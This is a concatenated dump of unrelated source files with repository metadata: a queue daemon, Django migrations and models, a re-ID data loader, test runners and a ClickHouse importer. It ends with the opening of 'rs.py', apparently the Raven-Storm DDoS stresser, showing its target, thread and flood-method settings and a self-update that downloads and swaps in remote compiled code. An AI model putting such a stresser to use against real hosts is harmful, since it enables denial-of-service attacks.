cfg_path = "/etc/agentredrabbit.conf"
if options.config_file is not None:
cfg_path = options.config_file
config = ReadConfig(cfg_path)
# Setup logger
log_level = logging.INFO
if options.verbose:
log_level = logging.DEBUG
logging.basicConfig(filename=config["log_file"], filemode="a",
level=log_level, format=log_format)
logging.getLogger("pika").setLevel(logging.INFO)
# Setup signal handlers
signal.signal(signal.SIGTERM, sighandler)
signal.signal(signal.SIGINT, sighandler)
signal.signal(signal.SIGQUIT, sighandler)
signal.signal(signal.SIGHUP, sighandler)
queues = filter(lambda x: x.strip() != "", config["queues"].split(":"))
# Failsafe queue handling
failsafeq = {}
# Read from dump file if available
dumpfilename = config["dump_file"]
if os.path.exists(dumpfilename):
with open(dumpfilename, "rb") as dumpfile:
failsafeq = pickle.load(dumpfile)
log.info("Loaded failsafeq: " + str(failsafeq))
for queue in queues:
if not queue in failsafeq:
failsafeq[queue] = []
setFailsafeQueue(failsafeq)
# Start threads
global threads, shutdown_event
shutdown_event = threading.Event()
qlock = threading.Lock()
threadcount = int(config["workers"])
log.info("[+] Starting workers for queues: " + ", ".join(queues))
for idx, queue in enumerate(queues * threadcount):
thread = Transporter(idx, qlock, config, queue, shutdown_event)
thread.start()
threads.append(thread)
# Hang on till a shutdown event is triggered
while not shutdown_event.is_set():
signal.pause()
# Dump in failsafeq to the dump file
try:
log.info("Dumping failsafe queue")
dumpfile = open(dumpfilename, "wb")
pickle.dump(getFailsafeQueue(), dumpfile)
dumpfile.close()
except IOError, err:
log.error("Dumpiing failsafe queue failed: %s", err)
log.info("We had a clean shutdown, Bye!")
sys.exit(0)
if __name__ == "__main__":
main()
| [
"rohit.yadav@wingify.com"
] | rohit.yadav@wingify.com |
24f6ce5d1d7d247f113554d063d6fe5404344652 | fb75a89ca9f9c322edccb28a0d8ca2983c183b5a | /ram/krish/migrations/0002_auto_20190909_1207.py | e8e876ba255083a632b6f15ca0bb5ade59a11717 | [] | no_license | Nagateja453/rkmission_django | af205d931dae3159f948a63e3e293aee1dc4a709 | a882248d6316535fa742248ad97af66d8cc82b6c | refs/heads/master | 2020-08-02T07:43:50.307469 | 2019-09-27T08:56:47 | 2019-09-27T08:56:47 | 211,277,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,232 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-09-09 12:07
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('krish', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='AddPost',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('Date_of_Birth', models.CharField(max_length=255)),
('Place_Of_Birth', models.CharField(max_length=255)),
('Parents', models.CharField(max_length=255)),
('Wife', models.CharField(max_length=255)),
('Religious_Views', models.CharField(max_length=255)),
('Philosopy', models.CharField(max_length=255)),
('Memorial', models.CharField(max_length=255)),
('Place_Of_Death', models.CharField(max_length=255)),
('slug', models.SlugField(blank=True, max_length=900, null=True)),
('title', models.CharField(max_length=255)),
('excerpt', models.TextField(blank=True, null=True)),
('meta_description', models.TextField(blank=True, null=True)),
('keywords', models.TextField(blank=True, null=True)),
('modified_on', models.DateTimeField(auto_now=True)),
('created_on', models.DateTimeField(auto_now=True)),
('content', tinymce.models.HTMLField(blank=True, null=True, verbose_name='Content')),
('project_image1', models.FileField(blank=True, null=True, upload_to='project_logo')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RemoveField(
model_name='director',
name='created_by',
),
migrations.DeleteModel(
name='director',
),
]
| [
"rahulkiranreddy13@gmail.com"
] | rahulkiranreddy13@gmail.com |
8fc33e667b9cd3bc3e640188e68f4aa66390f63a | 6bd4d4845ac3569fb22ce46e6bdd0a8e83dd38b7 | /fastreid/data/build.py | da5b4b0137cd82c4dc9cc869976c914e7c475f7a | [] | no_license | wodole/fast-reid | a227219acf2606124655d63fa88c0cf3e22f4099 | 9cf222e093b0d37c67d2d95829fdf74097b7fce1 | refs/heads/master | 2022-04-15T15:10:07.045423 | 2020-04-08T13:04:09 | 2020-04-08T13:04:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,159 | py | # encoding: utf-8
"""
@author: l1aoxingyu
@contact: sherlockliao01@gmail.com
"""
import logging
import torch
from torch._six import container_abcs, string_classes, int_classes
from torch.utils.data import DataLoader
from . import samplers
from .common import CommDataset, data_prefetcher
from .datasets import DATASET_REGISTRY
from .transforms import build_transforms
def build_reid_train_loader(cfg):
train_transforms = build_transforms(cfg, is_train=True)
logger = logging.getLogger(__name__)
train_items = list()
for d in cfg.DATASETS.NAMES:
logger.info('prepare training set {}'.format(d))
dataset = DATASET_REGISTRY.get(d)()
train_items.extend(dataset.train)
train_set = CommDataset(train_items, train_transforms, relabel=True)
num_workers = cfg.DATALOADER.NUM_WORKERS
batch_size = cfg.SOLVER.IMS_PER_BATCH
num_instance = cfg.DATALOADER.NUM_INSTANCE
if cfg.DATALOADER.PK_SAMPLER:
data_sampler = samplers.RandomIdentitySampler(train_set.img_items, batch_size, num_instance)
else:
data_sampler = samplers.TrainingSampler(len(train_set))
batch_sampler = torch.utils.data.sampler.BatchSampler(data_sampler, batch_size, True)
train_loader = torch.utils.data.DataLoader(
train_set,
num_workers=num_workers,
batch_sampler=batch_sampler,
collate_fn=fast_batch_collator,
)
return data_prefetcher(cfg, train_loader)
def build_reid_test_loader(cfg, dataset_name):
test_transforms = build_transforms(cfg, is_train=False)
logger = logging.getLogger(__name__)
logger.info('prepare test set {}'.format(dataset_name))
dataset = DATASET_REGISTRY.get(dataset_name)()
test_items = dataset.query + dataset.gallery
test_set = CommDataset(test_items, test_transforms, relabel=False)
num_workers = cfg.DATALOADER.NUM_WORKERS
batch_size = cfg.TEST.IMS_PER_BATCH
data_sampler = samplers.InferenceSampler(len(test_set))
batch_sampler = torch.utils.data.BatchSampler(data_sampler, batch_size, False)
test_loader = DataLoader(
test_set,
batch_sampler=batch_sampler,
num_workers=num_workers,
collate_fn=fast_batch_collator)
return data_prefetcher(cfg, test_loader), len(dataset.query)
def trivial_batch_collator(batch):
"""
A batch collator that does nothing.
"""
return batch
def fast_batch_collator(batched_inputs):
"""
A simple batch collator for most common reid tasks
"""
elem = batched_inputs[0]
if isinstance(elem, torch.Tensor):
out = torch.zeros((len(batched_inputs), *elem.size()), dtype=elem.dtype)
for i, tensor in enumerate(batched_inputs):
out[i] += tensor
return out
elif isinstance(elem, container_abcs.Mapping):
return {key: fast_batch_collator([d[key] for d in batched_inputs]) for key in elem}
elif isinstance(elem, float):
return torch.tensor(batched_inputs, dtype=torch.float64)
elif isinstance(elem, int_classes):
return torch.tensor(batched_inputs)
elif isinstance(elem, string_classes):
return batched_inputs
| [
"sherlockliao01@gmail.com"
] | sherlockliao01@gmail.com |
d5676fa17de1d686869f532cf7410e0555426ced | a75e7f434271f1ce4bc9e89f6cc10126aa1947e7 | /test/__main__.py | b6661dcb01917492dc29fa3c377d63eb7fd7c385 | [] | no_license | smutel/pylib | 53f0918ef897d5df5e2ecb7a6b0179bdd3647843 | 463873a0f9ff2052f740be632dde746be6e3b19b | refs/heads/master | 2020-06-15T16:26:16.476496 | 2016-11-25T14:15:44 | 2016-11-25T14:15:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,637 | py | #!/usr/bin/env python
# vim:ts=4:sts=4:sw=4:et
#
# Author: Hari Sekhon
# Date: 2015-11-14 12:21:54 +0000 (Sat, 14 Nov 2015)
#
# https://github.com/harisekhon/pylib
#
# License: see accompanying Hari Sekhon LICENSE file
#
# If you're using my code you're welcome to connect with me on LinkedIn and optionally send me feedback to help improve or steer this or other code I publish
#
# http://www.linkedin.com/in/harisekhon
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__author__ = 'Hari Sekhon'
__version__ = '0.1'
import glob
import inspect
import os
import subprocess
import sys
## using optparse rather than argparse for servers still on Python 2.6
#from optparse import OptionParser
# libdir = os.path.join(os.path.dirname(inspect.getfile(inspect.currentframe())), '..')
libdir = os.path.join(os.path.dirname(__file__), '..')
# sys.path.append(libdir)
# try:
# from harisekhon.utils import *
# except ImportError, e:
# print('module import failed: %s' % e)
# sys.exit(4)
def main():
print('running unit tests')
# this doesn't allow coverage to follow the code and see what's been covered
# for x in glob.glob(libdir + "/test/test_*.py"):
# if subprocess.call(['python', x]):
# sys.exit(2)
# subprocess.check_call(['python', x])
from test.test_utils import main
main()
from test.test_cli import main
main()
from test.test_nagiosplugin import main
main()
from test.test_threshold import main
main()
if __name__ == '__main__':
main()
| [
"harisekhon@gmail.com"
] | harisekhon@gmail.com |
f7a23f0389fe8115da3ae140207cef638d3ed979 | cb3634622480f918540ff3ff38c96990a1926fda | /PyProject/leetcode/history/symmetric-tree—2.py | 6a7f516c3065f6a3a5169f67922957b4efac8b15 | [] | no_license | jacksonyoudi/AlgorithmCode | cab2e13cd148354dd50a0487667d38c25bb1fd9b | 216299d43ee3d179c11d8ca0783ae16e2f6d7c88 | refs/heads/master | 2023-04-28T07:38:07.423138 | 2022-10-23T12:45:01 | 2022-10-23T12:45:01 | 248,993,623 | 3 | 0 | null | 2023-04-21T20:44:40 | 2020-03-21T14:32:15 | Go | UTF-8 | Python | false | false | 725 | py | # Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def isSymmetric(self, root):
if root is None:
return True
else:
return self.isMirror(root.left, root.right)
def isMirror(self, left, right):
if left is None and right is None:
return True
if left is None or right is None:
return False
if left.val == right.val:
outPair = self.isMirror(left.left, right.right)
inPiar = self.isMirror(left.right, right.left)
return outPair and inPiar
else:
return False
| [
"liangchangyoujackson@gmail.com"
] | liangchangyoujackson@gmail.com |
2fc6c3ca11a0533b9e305d1c97100d5ac134da5a | 7044043460c74a9c1c9d386bdeccb87289362f76 | /mysite/urls.py | 7794602ec06995938b9e62a0ce60bf93ca078cb7 | [] | no_license | KIMJONGIK/mysite | 6630682eca869b5122597baf2e2f59dd0b40869a | 84b908ea75602c7ca801eafb7dd975aadf70593b | refs/heads/master | 2022-12-09T14:33:38.741339 | 2020-09-16T11:48:53 | 2020-09-16T11:48:53 | 293,227,641 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,811 | py | """mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import main.views as mainviews
import guestbook.views as guestbookviews
import user.views as userviews
import board.views as boardviews
urlpatterns = [
path('main/', mainviews.index),
path('guestbook/', guestbookviews.index),
path('guestbook/add', guestbookviews.add),
path('guestbook/deleteform', guestbookviews.deleteform),
path('guestbook/delete', guestbookviews.delete),
path('user/joinform', userviews.joinform),
path('user/joinsuccess', userviews.joinsuccess),
path('user/join', userviews.join),
path('user/loginform', userviews.loginform),
path('user/login', userviews.login),
path('user/logout', userviews.logout),
path('user/updateform', userviews.updateform),
path('user/update', userviews.update),
path('board/', boardviews.index),
path('board/write', boardviews.write),
path('board/register', boardviews.register),
path('board/view', boardviews.view),
path('board/delete', boardviews.delete),
path('board/modifyform', boardviews.modifyform),
path('board/modify', boardviews.modify),
path('admin/', admin.site.urls),
] | [
"kji089@naver.com"
] | kji089@naver.com |
ac4fd9d309800d992975cd86089adb1fcd92fcef | 0c2023f797f1d2f35bac45755214f9aefe58c5a9 | /appium_xueqiu/page/market.py | b6b3a5623c806da67c8651a1804e41641db1b385 | [] | no_license | yofy01/Hogwarts | d844500697879e160cdc6d6df5edc09da0093517 | 56089fca86086bf8b4733e053829a93215c7b6d3 | refs/heads/master | 2023-07-14T16:08:07.952038 | 2021-08-23T13:37:39 | 2021-08-23T13:37:39 | 393,095,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | # -*- coding:utf-8 -*-
from time import sleep
from selenium.webdriver.common.by import By
from appium_xueqiu.page.base_page import BasePage
from appium_xueqiu.page.search import Search
class Market(BasePage):
def goto_search(self):
'''进入搜索页'''
# click
self.steps('../page/search.yaml')
return Search(self._driver) | [
"450552640@qq.com"
] | 450552640@qq.com |
bd7de553f05fa1f867155984ed21d76ea04a8ccb | e9db99651ec062fb0c924d01e5f29dfcd8e9ec1d | /clickhouse_import.py | 77dc9bc0e2eff61c0b1ca4a9de5e5060509edf41 | [] | no_license | whspr/clickhouse_py_xml_importer | b14c0a5847a36f077e0dbaf1ed4b1a3b389bd50a | ee686ae151f80c9c151a6890b47e5f47a2e8477f | refs/heads/master | 2022-12-11T17:09:36.445944 | 2017-05-27T15:40:59 | 2017-05-27T15:40:59 | 92,607,136 | 5 | 0 | null | 2022-12-07T23:56:12 | 2017-05-27T15:28:02 | Python | UTF-8 | Python | false | false | 4,002 | py | __author__ = 'whspr'
from lxml import etree
from time import time
import datetime
from infi.clickhouse_orm import models as md
from infi.clickhouse_orm import fields as fd
from infi.clickhouse_orm import engines as en
from infi.clickhouse_orm.database import Database
class Data(md.Model):
"""
structure of your data
"""
# describes datatypes and fields
available = fd.StringField()
category_id = fd.StringField()
currency_id = fd.StringField()
delivery = fd.StringField()
description = fd.StringField()
item_id = fd.StringField()
modified_time = fd.DateField()
name = fd.StringField()
oldprice = fd.StringField()
picture = fd.StringField()
price = fd.StringField()
sales_notes = fd.StringField()
topseller = fd.StringField()
# creating an sampled MergeTree
engine = en.MergeTree('modified_time', ('available', 'category_id', 'currency_id', 'delivery',
'description', 'item_id', 'name', 'oldprice', 'picture',
'price', 'sales_notes', 'topseller'))
def safely_get_data(element, key):
"""
Get value or return and error value
:param element: branch name with 'key: value' couple
:param key: key name
:return: value of 'key: value' couple or error message
"""
try:
for child in element:
if child.tag == key:
return child.text
except:
return "not found"
def parse_clickhouse_xml(filename, db_name, db_host):
"""
Parse xml file and insert it into db
:param filename: file name
:param db: database name
:param db_host: database host and port. Example: http://localhost:8123
"""
data_buffer = []
t = time()
# start read file
for event, offer in etree.iterparse(filename, tag="offer"):
# getting values
available = offer.attrib['available']
category_id = safely_get_data(offer, 'categoryId')
currency_id = safely_get_data(offer, 'currencyId')
delivery = safely_get_data(offer, 'delivery')
description = safely_get_data(offer, 'description')
item_id = offer.attrib['id']
modified_time = safely_get_data(offer, 'modified_time')
name = safely_get_data(offer, 'name')
oldprice = safely_get_data(offer, 'oldprice')
picture = safely_get_data(offer, 'picture')
price = safely_get_data(offer, 'price')
sales_notes = safely_get_data(offer, 'sales_notes')
topseller = safely_get_data(offer, 'top_seller')
# convert datatime from unix datetime style
modified_time = datetime.datetime.fromtimestamp(int(modified_time)).strftime('%Y-%m-%d')
# inserting data into clickhouse model representation
insert_data = Data(
available= available,
category_id= category_id,
currency_id= currency_id,
delivery= delivery,
description= description,
item_id= item_id,
modified_time= modified_time,
name= name,
oldprice= oldprice,
picture= picture,
price= price,
sales_notes= sales_notes,
topseller= topseller
)
# appends data into couple
data_buffer.append(insert_data)
offer.clear()
# print elasped time value to prepare a couple of data instances
print "time to prepare %s data %s" % (len(data_buffer), time() - t)
# open database with database name and database host values
db = Database(db_name, db_url=db_host)
# create table to insert prepared data
db.create_table(Data)
t = time()
# insert prepared data into database
db.insert(data_buffer)
print "time to insert %s" % (time() - t)
if __name__ == '__main__':
parse_clickhouse_xml(
'data.xml',
'database',
'http://localhost:8123'
) | [
"into.the.dissonance@gmail.com"
] | into.the.dissonance@gmail.com |
8fbf9b7344092e08c9267f703b7859249d1f88ef | 8717d1fbd4e9634d13e87e65d503aaac6ce3f4ca | /apps/products/models.py | f93950d5e69330cfd4a6565b4ea1e58bf88e223c | [] | no_license | asakeev01/Caravan | 679c1eae26647e162ba9b2cacff9960c177b247b | 84328f0ba91252c3c941aec5325ed60b074b45d6 | refs/heads/main | 2023-04-03T12:17:50.856731 | 2021-02-16T15:06:07 | 2021-02-16T15:06:07 | 339,434,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,518 | py | from django.db import models
from apps.categories.models import Category
class Product(models.Model):
name = models.CharField(max_length = 255)
description = models.TextField()
categories = models.ManyToManyField(Category, related_name = 'products')
def __str__(self):
return f'{self.name}'
class Colour(models.Model):
colour = models.CharField(max_length = 255)
def __str__(self):
return self.colour
class Size(models.Model):
size = models.CharField(max_length = 255)
hip = models.CharField(max_length = 255)
waist = models.CharField(max_length = 255)
def __str__(self):
return self.size
class ProductItem(models.Model):
product = models.ForeignKey(Product, on_delete = models.CASCADE, related_name = "product_items")
colour = models.ManyToManyField(Colour)
price = models.DecimalField(max_digits = 10, decimal_places = 0)
def __str__(self):
print(self.colour)
return f"{self.product.name}'s item of {self.price}"
class Quantity(models.Model):
product_item = models.ForeignKey(ProductItem, on_delete = models.CASCADE, related_name = "quantities")
size = models.ForeignKey(Size, on_delete = models.CASCADE)
quantity = models.PositiveIntegerField()
class Meta:
unique_together = ('product_item', 'size',)
verbose_name = 'Quantity'
verbose_name_plural = 'Quantities'
def __str__(self):
return f'The size {self.size} of {self.product_item.product.name} '
| [
"aidar.asakeev@gmail.com"
] | aidar.asakeev@gmail.com |
aedf4a7758d37e8f75483ebed1e2b39b589cc08d | c25ba294568ac36a04ae241511dbe012b3eaccfb | /Server/20180916213520426/Python/Server/Mark.py | bf976db936969b8c0211cf4b42c24236795d288b | [] | no_license | biabeniamin/CatalogScolarTeams | 1a502bc78c63be1a61ec5917835e2319bb7402dc | 247005895379683c510866500bb4a9ebf088c6c5 | refs/heads/master | 2023-02-16T16:58:46.333565 | 2021-01-19T19:59:02 | 2021-01-19T19:59:02 | 320,657,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,974 | py | #generated automatically
from sqlalchemy.orm import backref, relationship
from sqlalchemy.orm import validates
from SqlAlchemy import Base
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy import *
from sqlalchemy.dialects.mysql import DOUBLE
from ValidationError import ValidationError, validate_integer
from flask_restful import reqparse
import datetime
from math import floor
from Teacher import Teacher, getTeachers, getTeachersByTeacherId
from Student import Student, getStudents, getStudentsByStudentId
from Classe import Classe, getClasses, getClassesByClasseId
class Mark(Base):
@declared_attr
def __tablename__(cls):
return 'Marks'
#Fields
markId = Column('MarkId', Integer, primary_key=True)
value = Column('Value', Integer)
date = Column('Date', DateTime)
creationTime = Column('CreationTime', DateTime, default=datetime.datetime.utcnow)
#Foreign Fields
classeId = Column('ClasseId', Integer, ForeignKey("Classes.ClasseId"))
classes = relationship(Classe,backref = backref('marks'))
classe = null
studentId = Column('StudentId', Integer, ForeignKey("Students.StudentId"))
students = relationship(Student,backref = backref('marks'))
student = null
teacherId = Column('TeacherId', Integer, ForeignKey("Teachers.TeacherId"))
teachers = relationship(Teacher,backref = backref('marks'))
teacher = null
#Validation
@validates('classeId')
def validate_classeId(self, key, value):
return validate_integer(key, value, True)
@validates('studentId')
def validate_studentId(self, key, value):
return validate_integer(key, value, True)
@validates('teacherId')
def validate_teacherId(self, key, value):
return validate_integer(key, value, True)
@validates('value')
def validate_value(self, key, value):
return validate_integer(key, value, False)
#Functions
#complete classes funtion
def completeClasses(session, marks):
classes = getClasses(session)
for row in marks:
start = 0
end = len(classes)
while True:
mid = floor((start + end) / 2)
if(row.classeId > classes[mid].classeId):
start = mid + 1
elif(row.classeId < classes[mid].classeId):
end = mid - 1
elif(row.classeId == classes[mid].classeId):
start = mid + 1
end = mid - 1
row.classe = classes[mid]
if(start > end):
break
return marks
#complete students funtion
def completeStudents(session, marks):
students = getStudents(session)
for row in marks:
start = 0
end = len(students)
while True:
mid = floor((start + end) / 2)
if(row.studentId > students[mid].studentId):
start = mid + 1
elif(row.studentId < students[mid].studentId):
end = mid - 1
elif(row.studentId == students[mid].studentId):
start = mid + 1
end = mid - 1
row.student = students[mid]
if(start > end):
break
return marks
#complete teachers funtion
def completeTeachers(session, marks):
teachers = getTeachers(session)
for row in marks:
start = 0
end = len(teachers)
while True:
mid = floor((start + end) / 2)
if(row.teacherId > teachers[mid].teacherId):
start = mid + 1
elif(row.teacherId < teachers[mid].teacherId):
end = mid - 1
elif(row.teacherId == teachers[mid].teacherId):
start = mid + 1
end = mid - 1
row.teacher = teachers[mid]
if(start > end):
break
return marks
#get funtion
def getMarks(session):
result = session.query(Mark).all()
result = completeClasses(session, result)
result = completeStudents(session, result)
result = completeTeachers(session, result)
return result
#get dedicated request funtions
def getMarksByClasseIdStudentId(session, classeId, studentId):
result = session.query(Mark).filter(Mark.classeId == classeId, Mark.studentId == studentId).all()
result = completeClasses(session, result)
result = completeStudents(session, result)
result = completeTeachers(session, result)
return result
def getMarksByStudentId(session, studentId):
result = session.query(Mark).filter(Mark.studentId == studentId).all()
result = completeClasses(session, result)
result = completeStudents(session, result)
result = completeTeachers(session, result)
return result
def getMarksByMarkId(session, markId):
result = session.query(Mark).filter(Mark.markId == markId).all()
result = completeClasses(session, result)
result = completeStudents(session, result)
result = completeTeachers(session, result)
return result
#add funtion
def addMark(session, mark):
mark.creationTime = datetime.datetime.utcnow()
session.add(mark)
session.commit()
#this must stay because sqlalchemy query the database because of this line
print('Value inserted with markId=', mark.markId)
mark.teacher = getTeachersByTeacherId(session, mark.teacherId)[0]
mark.student = getStudentsByStudentId(session, mark.studentId)[0]
mark.classe = getClassesByClasseId(session, mark.classeId)[0]
return mark
#update funtion
def updateMark(session, mark):
result = session.query(Mark).filter(Mark.markId == mark.markId).first()
result = mark
session.commit()
result = session.query(Mark).filter(Mark.markId == mark.markId).first()
result.teacher = getTeachersByTeacherId(session, result.teacherId)[0]
result.student = getStudentsByStudentId(session, result.studentId)[0]
result.classe = getClassesByClasseId(session, result.classeId)[0]
return result
#delete funtion
def deleteMark(session, markId):
result = session.query(Mark).filter(Mark.markId == markId).first()
session.delete(result)
session.commit()
return result
#API endpoints
#request parser funtion
def getmarkRequestArguments():
parser = reqparse.RequestParser()
parser.add_argument('classeId')
parser.add_argument('studentId')
parser.add_argument('teacherId')
parser.add_argument('value')
parser.add_argument('date')
return parser
| [
"biabeniamin@outlook.com"
] | biabeniamin@outlook.com |
5805016b6deb1eb7bbccac74feb8dc8aebe20e1f | 682a16bc7705f16af80b87775780ecb41c7fb1d5 | /rs.py | 353aa60f04c850e268adb741b2de57ce7e5e8d74 | [
"MIT"
] | permissive | dannydeleon8998/RapeStresser | 4e4feea9d306c24ce4ca1575e4d6857e1c3eb4c5 | 3521997cb3baff5fd4955ca5fa4edc2d41f675b4 | refs/heads/master | 2022-04-27T07:39:55.382610 | 2020-04-28T02:29:29 | 2020-04-28T02:29:29 | 259,509,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76,555 | py | # MIT LICENCE Taguar258 2020
# Please read the Licence to know your permissions.
argvexit = False
try:
import socket
import os
import sys
import time
from threading import Thread
import urllib2
import re
import redis
import pickle
import wget
import nmap
try:
import readline
except:
pass
import requests
except Exception as e:
print("Imports could not be done/missing imports.")
print("All imports of file: (socket, os, sys, time, threading, urllib2, pickle, re), redis, wget, nmap.")
print(e)
sys.exit()
if argvexit:
sys.exit()
try:
if "--update" == sys.argv[1]:
try:
os.system("rm -i %s" % sys.argv[0])
wget.download("https://github.com/Taguar258/Raven-Storm/blob/master/rs.pyo?raw=true ")
os.system("mv rs.pyo?raw=true %s" % sys.argv[0])
except:
print("Error.")
sys.exit()
except:
pass
rsversion = "2.8"
ip = ""
port = 80
messages = 'hello its me, rs'
threads = 160
rtxt = 1
messagezw = messages
sleepy = 0
timeforstress = 0.5
stresserror = "false"
stressstep = 2
runactive = 'true'
outtxt = "true"
outtxtmute = False
zwouttxt = "true"
modeh = "false"
stress = "false"
stresstestvar = 1
setmb = 0
helphelp = 'true'
autostart = 0
autostop = 0
autostep = 0
autostarttime = 0
# list
listwebtext = ""
listweblist = "" # << will become array
listwebtrue = "false"
listportstext = ""
listportslist = "" # << will become array
listportstrue = "false"
# ddos | new:
hclient = False
hserver = False
hip = "127.0.0.1"
hport = "6379"
myclid = 1
#method: udp, tcp
socketmethod = "tcp"
runcomonstart = []
# pod
podtarget = ""
podsize = 65500
podmaxsize = 65500
podminsize = 5
podthreads = 30
podsleep = 0
podautodl = 0
podinterval = 0
layersevenmethod = ["REQUEST"]
layersevenpostvar = ""
layersevenposttxt = ""
layersevengetvar = ""
layersevengettxt = ""
layerseventarget = ""
layerseventhreads = 200
layerseveninterval = 0
layersevensleep = 0
nmapinstalledq = False
userissueshva = False
try:
nm = nmap.PortScanner()
nmapinstalledq = True
except:
print("Please install nmap.")
print("Some functions will not work without it.")
try:
raw_input("[Press enter to continue without nmap]")
except:
sys.exit()
# verbosed:
verbosed = False
try:
if "-dv" in sys.argv:
verbosed = True
except:
verbosed = False
if verbosed:
print("[Verbosed True]")
import pdb
#pdb.set_trace()
# help
if "-h" in sys.argv or "--help" in sys.argv:
print("Please have a look at the RavenStorm documentation. [c, ros, f]")
sys.exit()
if "-dgcn" in sys.argv:
print("Made by Taguar258. JL")
sys.exit()
# automated
lister = []
try:
lister = pickle.load(open("ravenstorm-automated-list.ravenstormlist", "r"))
if verbosed:
print(lister)
except:
lister = []
iplister = 0
portlister = 0
threadslister = 0
messageslister = 0
rtxtlister = 0
sleepylister = 0
outtxtlister = 0
outtxtmutelister = 0
hiplister = 0
hportlister = 0
socketmethodlister = 0
podsizelister = 0
podthreadslister = 0
podsleeplister = 0
podautodllister = 0
podintervallister = 0
iplisterstandard = ip
portlisterstandard = port
threadslisterstandard = threads
messageslisterstandard = messages
rtxtlisterstandard = rtxt
sleepylisterstandard = sleepy
outtxtlisterstandard = outtxt
outtxtmutelisterstandard = outtxtmute
hiplisterstandard = hip
hportlisterstandard = hport
socketmethodlisterstandard = socketmethod
podsizelisterstandard = podsize
podthreadslisterstandard = podthreads
podsleeplisterstandard = podsleep
podautodllisterstandard = podautodl
podintervallisterstandard = podinterval
if len(lister) != 0:
try:
for listinglister in lister:
if listinglister[0] == "ip":
if iplister == 0:
ip = listinglister[1]
iplisterstandard = listinglister[1]
iplister = int(listinglister[2])
elif int(listinglister[2]) > int(iplister):
ip = listinglister[1]
iplisterstandard = listinglister[1]
iplister = int(listinglister[2])
elif listinglister[0] == "port":
if portlister == 0:
port = listinglister[1]
portlisterstandard = listinglister[1]
portlister = int(listinglister[2])
elif int(listinglister[2]) > int(portlister):
port = listinglister[1]
portlisterstandard = listinglister[1]
portlister = int(listinglister[2])
elif listinglister[0] == "threads":
if threadslister == 0:
threads = listinglister[1]
threadslisterstandard = listinglister[1]
threadslister = int(listinglister[2])
elif int(listinglister[2]) > int(threadslister):
threads = listinglister[1]
threadslisterstandard = listinglister[1]
threadslister = int(listinglister[2])
elif listinglister[0] == "messages":
if messageslister == 0:
messages = listinglister[1]
messageslisterstandard = listinglister[1]
messageslister = int(listinglister[2])
elif int(listinglister[2]) > int(messageslister):
messages = listinglister[1]
messageslisterstandard = listinglister[1]
messageslister = int(listinglister[2])
elif listinglister[0] == "rtxt":
if rtxtlister == 0:
rtxt = listinglister[1]
rtxtlisterstandard = listinglister[1]
rtxtlister = int(listinglister[2])
elif int(listinglister[2]) > int(rtxtlister):
rtxt = listinglister[1]
rtxtlisterstandard = listinglister[1]
rtxtlister = int(listinglister[2])
elif listinglister[0] == "sleepy":
if sleepylister == 0:
sleepy = listinglister[1]
sleepylisterstandard = listinglister[1]
sleepylister = int(listinglister[2])
elif int(listinglister[2]) > int(sleepylister):
sleepy = listinglister[1]
sleepylisterstandard = listinglister[1]
sleepylister = int(listinglister[2])
elif listinglister[0] == "outtxt":
if outtxtlister == 0:
outtxt = listinglister[1]
outtxtlisterstandard = listinglister[1]
outtxtlister = int(listinglister[2])
elif int(listinglister[2]) > int(outtxtlister):
outtxt = listinglister[1]
outtxtlisterstandard = listinglister[1]
outtxtlister = int(listinglister[2])
elif listinglister[0] == "outtxtmute":
if outtxtmutelister == 0:
outtxtmute = listinglister[1]
outtxtmutelisterstandard = listinglister[1]
outtxtmutelister = int(listinglister[2])
elif int(listinglister[2]) > int(outtxtmutelister):
outtxtmute = listinglister[1]
outtxtmutelisterstandard = listinglister[1]
outtxtmutelister = int(listinglister[2])
elif listinglister[0] == "hip":
if hiplister == 0:
hip = listinglister[1]
hiplisterstandard = listinglister[1]
hiplister = int(listinglister[2])
elif int(listinglister[2]) > int(hiplister):
hip = listinglister[1]
hiplisterstandard = listinglister[1]
hiplister = int(listinglister[2])
elif listinglister[0] == "hport":
if hportlister == 0:
hport = listinglister[1]
hportlisterstandard = listinglister[1]
hportlister = int(listinglister[2])
elif int(listinglister[2]) > int(hportlister):
hport = listinglister[1]
hportlisterstandard = listinglister[1]
hportlister = int(listinglister[2])
elif listinglister[0] == "method":
if socketmethodlister == 0:
socketmethod = listinglister[1]
socketmethodlisterstandard = listinglister[1]
socketmethodlister = int(listinglister[2])
elif int(listinglister[2]) > int(socketmethodlister):
socketmethod = listinglister[1]
socketmethodlisterstandard = listinglister[1]
socketmethodlister = int(listinglister[2])
elif listinglister[0] == "podsize":
if podsizelister == 0:
podsize = listinglister[1]
podsizelisterstandard = listinglister[1]
podsizelister = int(listinglister[2])
elif int(listinglister[2]) > int(podsizelister):
podsize = listinglister[1]
podsizelisterstandard = listinglister[1]
podsizelister = int(listinglister[2])
